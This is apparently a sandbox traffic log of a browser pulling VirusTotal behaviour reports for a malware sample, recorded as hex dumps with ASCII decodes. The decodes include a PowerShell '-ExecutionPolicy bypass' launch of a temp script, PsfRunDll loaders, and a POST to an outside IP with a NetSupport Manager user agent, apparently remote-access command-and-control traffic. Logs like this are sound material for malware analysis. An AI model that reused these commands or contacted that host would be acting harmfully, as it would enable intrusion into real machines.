                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM5MDA5NTMwNzQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTY4LjQ1Mg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 76ff35d93d0e8252c0fc6309e3c649d7
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:10 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:10 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 33 33 30 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 6e 61 74 69 76 65 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 62 79 70 61 73 73 20 2d 46 69 6c 65 20 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 79 79 79 6b 4f 72 6c 42 69 56 4e 64 54 66 50 47 51 57 53 4f 2e 70 73 31 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "process_id": "3300", "name": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy bypass -File \"C:\\Users\\<USER>\\AppData\\Local\\Temp\\yyykOrlBiVNdTfPGQWSO.ps1\"",
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC548INData Raw: 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 55 73 65 72 20 44 61 74 61 5c 22 20 2f 70 72 65 66 65 74 63 68 3a 34 20 2d 2d 6d 6f 6e 69 74 6f 72 2d 73 65 6c 66 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 74 79 70 65 3d 63 72 61 73 68 70 61 64 2d 68 61 6e 64 6c 65 72 20 5c 22 2d 2d 64 61 74 61 62 61 73 65 3d 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 55 73 65 72 20 44 61 74 61 5c 5c 43 72 61 73 68 70 61 64 5c 22 20 2d 2d 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 32 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 72 2f 72 65 70 6f 72 74 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 63 68 61 6e 6e 65 6c 3d 20 2d 2d 61
                                                                                                                                                                                                                    Data Ascii: ta\\Local\\Google\\Chrome\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\<USER>\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --url=https://clients2.google.com/cr/report --annotation=channel= --a
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 33 35 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 6e 65 74 77 6f 72 6b 2e 6d 6f 6a 6f 6d 2e 4e 65 74 77 6f 72 6b 53 65 72 76 69 63 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c
                                                                                                                                                                                                                    Data Ascii: "process_id": "5356", "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-cl
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 37
                                                                                                                                                                                                                    Data Ascii: andle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:8" }, { "process_id": "7
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1280INData Raw: 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34
                                                                                                                                                                                                                    Data Ascii: :\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5304 --field-trial-handle=1920,i,8249134
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 50 73 66 52 75 6e 44 6c 6c 33 32 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 34 36 33 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Users\\<USER>\\AppData\\Local\\Temp\\PsfRunDll32.exe\"" }, { "process_id": "4632", "name": "\"C:\\Users\\<USER>\\AppData\\Local\\Temp
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 65 74 73 76 63 73 20 2d 70 20 2d 73 20 57 69 6e 6d 67 6d 74 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 32 39 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 6e 65 74 73 76 63 73 20 2d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: etsvcs -p -s Winmgmt" }, { "process_id": "5296", "name": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1280INData Raw: 73 74 72 69 63 74 65 64 20 2d 70 20 2d 73 20 4e 67 63 43 74 6e 72 53 76 63 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 33 38 36 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65 2e 65 78 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: stricted -p -s NgcCtnrSvc" }, { "process_id": "3860", "name": "C:\\Windows\\system32\\SecurityHealthService.exe"
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC1408INData Raw: 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 56 46 53 2f 50 72 6f 67 72 61 6d 46 69 6c 65 73 58 36 34 2f 50 73 66 52 75 6e 44 6c 6c 36 34 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 73 5f 65 76 74 78 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 75 74 65 78 65 73 5f 63 72 65 61 74 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 63 61 6c 5c 5c 5a 6f 6e 65 73 43 61 63 68 65 43 6f 75 6e 74 65 72 4d 75 74 65 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: Users\\<USER>\\AppData\\Local\\Temp\\VFS/ProgramFilesX64/PsfRunDll64.exe\"" } ], "has_evtx": false, "mutexes_created": [ "Local\\ZonesCacheCounterMutex",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    243192.168.2.165000274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:10 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:11 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6b563c3cf5c7fcf31e01fa8b83933b31
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:11 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:11 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    244192.168.2.165000374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:14 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTEzNzUxMjYzNDctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTczLjQ1MQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: bdbcf8a1db71e9f7f969397da2c68c25
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:15 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:15 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 6c 22 3a 20 22 68 74 74 70 3a 2f 2f 35 2e 38 2e 36 33 2e 31 34 30 3a 34 34 33 2f 66 61 6b 65 75 72 6c 2e 68 74 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 71 75 65 73 74 5f 6d 65 74 68 6f 64 22 3a 20 22 50 4f 53 54 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 71 75 65 73 74 5f 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 4e 65 74 53 75 70 70 6f 72 74 20 4d 61 6e 61 67 65 72 2f 31 2e 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: l": "http://5.8.63.140:443/fakeurl.htm", "request_method": "POST", "request_headers": { "User-Agent": "NetSupport Manager/1.3" } },
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC544INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 73 5f 6d 65 6d 64 75 6d 70 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 73 5f 64 65 6c 65 74 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 63 68 72 6f 6d 65 5f 42 49 54 53 5f 35 32 36 34 5f 39 36 31 34 33 37 33 32 34 5c 5c 42 49 54 33 41 43 33 2e 74 6d 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 63 68 72 6f 6d 65 5f 42 49 54 53 5f 35 32 36 34 5f 32 31 33 33 35 39 35
                                                                                                                                                                                                                    Data Ascii: } ], "has_memdump": true, "files_deleted": [ "C:\\Program Files\\chrome_BITS_5264_961437324\\BIT3AC3.tmp", "C:\\Program Files\\chrome_BITS_5264_2133595
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 37 37 30 66 32 30 33 63 39 61 62 30 38 37 31 61 35 63 63 32 62 30 38 63 30 63 61 38 37 37 63 65 33 63 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 61 74 68 22 3a 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 65 6c 71 32 74 6a 74 71 2e 78 62 75 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 32 35 36 22 3a 20 22 39 36 61 64 31 31 34 36 65 62 39 36 38 37 37 65 61 62 35 39 34 32 61 65 30 37 33 36 62 38 32 64 38 62 35 65 32 30 33 39 61 38 30 64 33 64 36 39 33 32 36 36 35 63 31 61 34 63 38 37 64 63 66 37 22
                                                                                                                                                                                                                    Data Ascii: 770f203c9ab0871a5cc2b08c0ca877ce3c" }, { "path": "__PSScriptPolicyTest_elq2tjtq.xbu.psm1", "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"
